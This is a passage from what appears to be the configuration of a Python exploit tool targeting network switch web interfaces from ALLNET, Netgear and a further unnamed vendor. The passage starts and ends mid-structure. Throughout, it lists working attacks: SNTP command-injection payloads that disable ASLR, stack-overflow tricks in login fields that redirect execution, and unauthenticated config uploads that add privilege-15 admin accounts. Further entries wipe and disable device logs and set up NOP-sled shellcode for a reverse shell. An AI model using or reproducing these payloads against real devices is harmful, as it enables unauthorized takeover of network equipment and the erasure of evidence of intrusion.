True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntp=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139&_de=1\":{}}',\r\n\t\t\t\t\t\t'delete_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'delete_query':'{\"_ds=1&sntp=1&timezone=0&srvDef=ipv4&srvHost=+&port=0&dlsType=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=sys_time',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&sntp=0&_de=1\":{}}',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\t# Not vulnerable \r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\r\n\t\t\t\t\t\t#'log_settings_set_cmd':'&logState=1&consoleState=1&ramState=1&fileState=1',\t# Enable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&empty=1',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'&target=0',\t\t\t\t# Clean RAM CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':True,\t\t\t\t# Clean RAM SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'&target=1',\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':True,\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'content':'{\"_ds=1&username='+ self.random_string(348)+ '_JUMP_&password='+ self.random_string(308) +'_CMD_&_de=1\":{}}',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=`echo 0 > /proc/sys/kernel/randomize_va_space`&port=139',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp=1&srvDef=ipv4&srvHost=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&port=139',\r\n\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp=1&srvDef=ipv4&srvHost=+&port=139',\t\t\t\t# CMD\r\n\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp=1',\t# Enable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp=0',\t# Disable CMD\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': True,\t\t# SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t#'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t\t'query':'{\"_ds=1&username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&_de=1\":{}}',\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'ALLNET': {\r\n\t\t\t\t'vendor': 'ALLNET GmbH Computersysteme',\r\n\t\t\t\t'uri':'https://www.allnet.de/',\r\n\t\t\t\t'modulus_uri':'',\r\n\t\t\t\t'info_leak':False,\r\n\t\t\t\t'info_leak_JSON':False,\r\n\t\t\t\t'info_leak_uri':'',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':False,\r\n\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t'query':'username=USERNAME&password=PASSWORD&login=1',\r\n\t\t\t\t\t'status_uri':'/cgi-bin/dispatcher.cgi?cmd=547',\r\n\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'LOGGING_SERVICE=0&cmd=4353',\r\n\t\t\t\t\t\t'status':'/cgi-bin/dispatcher.cgi?cmd=4352',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logfile_query':'cmd_4364=Clear+file+messages',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'clean_logmem_query':'cmd_4364=Clear+buffered+messages',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': {\r\n\t\t\t\t\t\t'httpuploadbakcfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"backup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadbakcfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadruncfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httprestorecfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload \"startup-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httprestorecfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':' Invalid config file!!', # one 0x20 in beginning\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'dispatcher.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t\t'content':'username=admin&password='+ self.random_string(184) + '&login=1',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpuploadfirmware.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpuploadfirmware.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'Image Signature Error',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'httpupload_runstart_cfg.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'file',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/update \"running-config\" (PoC: Create invalid file to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/httpupload_runstart_cfg.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'content_check':'/tmp/startup-config',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'version_upgrade.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Upload/Upgrade \"Firmware\" (Frontend to \"httpuploadfirmware.cgi\")',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/version_upgrade.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'Firm Upgrade',\r\n\t\t\t\t\t\t\t'content_check':'Firm Upgrade',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'factory_reset.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':True,\r\n\t\t\t\t\t\t\t'description':'Reset device to factory default (PoC: Too dangerous to verify)',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/factory_reset.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'Too dangerous to verify',\r\n\t\t\t\t\t\t\t'content_check':'dummy',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': False\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'sysinfo_config.cgi':{\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'html',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'description':'System basic information configuration (Frontend to \"change_mac_addr_set.cgi\")',\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/sysinfo_config.cgi',\r\n\t\t\t\t\t\t\t'check_uri':'',\r\n\t\t\t\t\t\t\t'content':'dummy',\r\n\t\t\t\t\t\t\t'content_check':'\"/cgi-bin/change_mac_addr_set',\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t\t\t'change_mac_addr_set.cgi': {\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"switch_type/sys_hardver\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'uri':'/cgi-bin/change_mac_addr_set.cgi',\r\n\t\t\t\t\t\t\t'content':'switch_type='+ self.random_string(116) +'&sys_hardver=31337&sys_macaddr=DE:AD:BE:EF:13:37&sys_serialnumber=DE:AD:BE:EF:13:37&password=tgnetadmin',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': False # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'encryption':'clear',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nSYSTEM CONFIG FILE ::= BEGIN\\nusername \"USERNAME\" password PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi-bin/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'', \r\n\t\t\t\t\t\t'del_uri':'/cgi-bin/dispatcher.cgi?cmd=524&usrName=USERNAME',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':False,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'enable_query':'sntp_enable=1&cmd=548',\r\n\t\t\t\t\t\t'status_uri':'cmd=547',\r\n\t\t\t\t\t\t'inject_uri':'/cgi-bin/dispatcher.cgi',\r\n\r\n\t\t\t\t\t\t'inject_query':'sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'check_query':'sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123&cmd=550',\r\n\r\n\t\t\t\t\t\t'delete_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'delete_query':'sntp_Server=+&sntp_Port=123&cmd=550',\r\n\t\t\t\t\t\t'disable_uri':'/cgi-bin/dispatcher.cgi',\r\n\t\t\t\t\t\t'disable_query':'sntp_enable=0&cmd=548',\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The stack overflow in 'username' and 'password' at same request are multipurpose.\r\n\t\t\t\t\t#\r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# The trick to jump and execute:\r\n\t\t\t\t\t# 1. Code: username=[garbage][RA + 0x58000000]&password=[garbage][NULL termination]\r\n\t\t\t\t\t# 2. [NULL termination] will overwrite 0x58 in RA so we can jump within the binary\r\n\t\t\t\t\t# 3. We dont jump to beginning of the functions, we jump just after 'sw $ra,($sp)' (important)\r\n\t\t\t\t\t# 4. We will also feed required function parameters, by adding them to '_CMD_'\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'stack_cgi_diag': {\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_log': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable/Clean logs)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\r\n\t\t\t\t\t\t'log_settings_set_cmd':'&LOGGING_SERVICE=0',\t\t\t# Disable Logging CMD\r\n\t\t\t\t\t\t'log_settings_set_SIGSEGV':True,\t\t\t\t\t\t# Disable Logging SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_ramClear_cmd':'',\t\t\t\t\t\t\t\t\t# Clean RAM log CMD\r\n\t\t\t\t\t\t'log_ramClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean RAM log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'log_fileClear_cmd':'',\t\t\t\t\t\t\t\t\t# Clean FILE log CMD\r\n\t\t\t\t\t\t'log_fileClear_SIGSEGV':False,\t\t\t\t\t\t\t# Clean FILE log SIGSEGV ?\r\n\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'stack_cgi_sntp': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: Disable ASLR)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'content':'username='+ self.random_string(112) +'_JUMP_&password='+ self.random_string(80) +'_CMD_&login=1',\r\n\t\t\t\t\t\t'sys_timeSntp_set_cmd':'&sntp_Server=`echo 0 > /proc/sys/kernel/randomize_va_space`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntp_set_check':'&sntp_Server=`cat /proc/sys/kernel/randomize_va_space > /tmp/check`&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSntpDel_set_cmd':'&sntp_Server=+&sntp_Port=123',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_enable':'&sntp_enable=1',\r\n\t\t\t\t\t\t'sys_timeSettings_set_cmd_disable':'&sntp_enable=0',\r\n\t\t\t\t\t\t'sys_timeSettings_set_SIGSEGV': False,\t\t# SIGSEGV ?\r\n\t\t\t\t\t\t'workaround':True,\t# My LAB workaround\r\n\t\t\t\t\t\t'verify_uri':'/tmp/check',\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\r\n\t\t\t\t\t#\r\n\t\t\t\t\t# After disabled ASLR, we can proceed to put NOP sled and shellcode on stack.\r\n\t\t\t\t\t# Then we will start walk down from top of stack to hit the NOP sled to execute shellcode\r\n\t\t\t\t\t#\r\n\t\t\t\t\t'heack_cgi_shell': {\r\n\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'login_uri':'/cgi-bin/dispatcher.cgi?cmd=1',\r\n\t\t\t\t\t\t'logout_uri':'/cgi-bin/dispatcher.cgi?cmd=3',\r\n\t\t\t\t\t\t'query':'username=_ALIGN_USRNOP_SHELLCODE&password=_PWDNOP_RA_START&login=1',\r\n\t\t\t\t\t\t'workaround':False,\t# My LAB workaround\r\n\t\t\t\t\t\t#'stack':False, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'stack':True, # False = use Heap, and there are no ASLR\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t},\r\n\r\n\t\t\t\t},\r\n\t\t\t},\r\n\r\n\t\t\t'Netgear': { \r\n\t\t\t\t'vendor': 'NETGEAR Inc.',\r\n\t\t\t\t'modulus_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'info_leak':True,\r\n\t\t\t\t'info_leak_JSON':True,\r\n\t\t\t\t'info_leak_uri':'/cgi/get.cgi?cmd=home_login',\r\n\t\t\t\t'xsid':False,\r\n\t\t\t\t'xsid_uri':'/cgi/get.cgi?cmd=home_main',\r\n\t\t\t\t'login': {\r\n\t\t\t\t\t'description':'Login/Logout on remote device',\r\n\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t'json':True,\r\n\t\t\t\t\t'encryption':'rsa',\r\n\t\t\t\t\t'login_uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t'query':'{\"_ds=1&username=USERNAME&password=PASSWORD&_de=1\":{}}',\r\n\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=home_loginStatus',\r\n\t\t\t\t\t'logout_uri':'/cgi/set.cgi?cmd=home_logout',\r\n\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t'log':{\r\n\t\t\t\t\t\t'description':'Disable and clean logs',\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'disable_uri':'/cgi/set.cgi?cmd=log_settings',\r\n\t\t\t\t\t\t'disable_query':'{\"_ds=1&ram_sev_0=on&ram_sev_1=on&ram_sev_2=on&ram_sev_3=on&ram_sev_4=on&ram_sev_5=on&ram_sev_6=on&_de=1\":{}}',\r\n\t\t\t\t\t\t'status':'/cgi/get.cgi?cmd=log_settings',\r\n\t\t\t\t\t\t'clean_logfile_uri':'/cgi/set.cgi?cmd=log_fileClear',\r\n\t\t\t\t\t\t'clean_logfile_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'clean_logmem_uri':'/cgi/set.cgi?cmd=log_ramClear',\r\n\t\t\t\t\t\t'clean_logmem_query':'{\"\":{}}',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t},\r\n\t\t\t\t# Verify lacking authentication\r\n\t\t\t\t'verify': { \r\n\t\t\t\t\t\t'set.cgi': { # 'username' also suffer from stack overflow\r\n\t\t\t\t\t\t\t'description':'Stack overflow in \"username/password\" (PoC: crash CGI)',\r\n\t\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t\t'response':'502',\r\n\t\t\t\t\t\t\t'Content-Type':False,\r\n\t\t\t\t\t\t\t'uri':'/cgi/set.cgi?cmd=home_loginAuth',\r\n\t\t\t\t\t\t\t'content':'{\"_ds=1&username=admin&password=' + self.random_string(312) + '&_de=1\":{}}',\r\n\t\t\t\t\t\t\t'check_uri':False,\r\n\t\t\t\t\t\t\t'content_check':False,\r\n\t\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t\t},\r\n\t\t\t\t},\r\n\t\t\t\t'exploit': {\r\n\t\t\t\t\t'heack_hydra_shell': {\r\n\t\t\t\t\t\t'description':'[Boa/Hydra] Stack overflow in Boa/Hydra web server (PoC: reverse shell)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'uri':'/cgi-bin/httpupload.cgi?XXX', # Including alignment of opcodes in memory\r\n\t\t\t\t\t\t'vulnerable': True,\r\n\t\t\t\t\t\t'safe': True # Boa/Hydra restart/watchdog, False = no restart, True = restart\r\n\t\t\t\t\t},\r\n\t\t\t\t\t'priv15_account': {\r\n\t\t\t\t\t\t'description':'Upload/Update running-config (PoC: add priv 15 credentials)',\r\n\t\t\t\t\t\t'authenticated': False,\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'encryption':'md5',\r\n\t\t\t\t\t\t'content':'Content-Type\\n\\nconfig-file-header\\nusername \"USERNAME\" secret encrypted PASSWORD\\n\\n------',\r\n\t\t\t\t\t\t'add_uri':'/cgi/httpuploadruncfg.cgi',\r\n\t\t\t\t\t\t'del_query':'{\"_ds=1&user=USERNAME&_de=1\":{}}',\r\n\t\t\t\t\t\t'del_uri':'/cgi/set.cgi?cmd=aaa_userDel',\r\n\t\t\t\t\t\t'vulnerable': False,\r\n\t\t\t\t\t\t'safe': True\r\n\t\t\t\t\t}, \r\n\t\t\t\t\t'sntp': {\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\t# Most probably it is vulnerable\r\n\t\t\t\t\t\t#\r\n\t\t\t\t\t\t'description':'SNTP command injection (PoC: disable ASLR)',\r\n\t\t\t\t\t\t'json':True,\r\n\t\t\t\t\t\t'authenticated': True,\r\n\t\t\t\t\t\t'enable_uri':'/cgi/set.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'enable_query':'{\"_ds=1&sntpStatus=1&_de=1\":{}}',\r\n\t\t\t\t\t\t'status_uri':'/cgi/get.cgi?cmd=sys_timeSettings',\r\n\t\t\t\t\t\t'inject_uri':'/cgi/set.cgi?cmd=sys_timeSntp',\r\n\t\t\t\t\t\t'inject_query':'{\"_ds=1&srvDef=byIp&sntpServer=`echo 0 > /proc/sys/kernel/randomize_va_space`&cursntpPort=123&_de=1\":{}}',\r\n\t\t\t\t\t\t'check_query':'{\"_ds=1&srvDef=byIp&sntpServer=`cat /proc/sys/kernel/randomize_va_space > 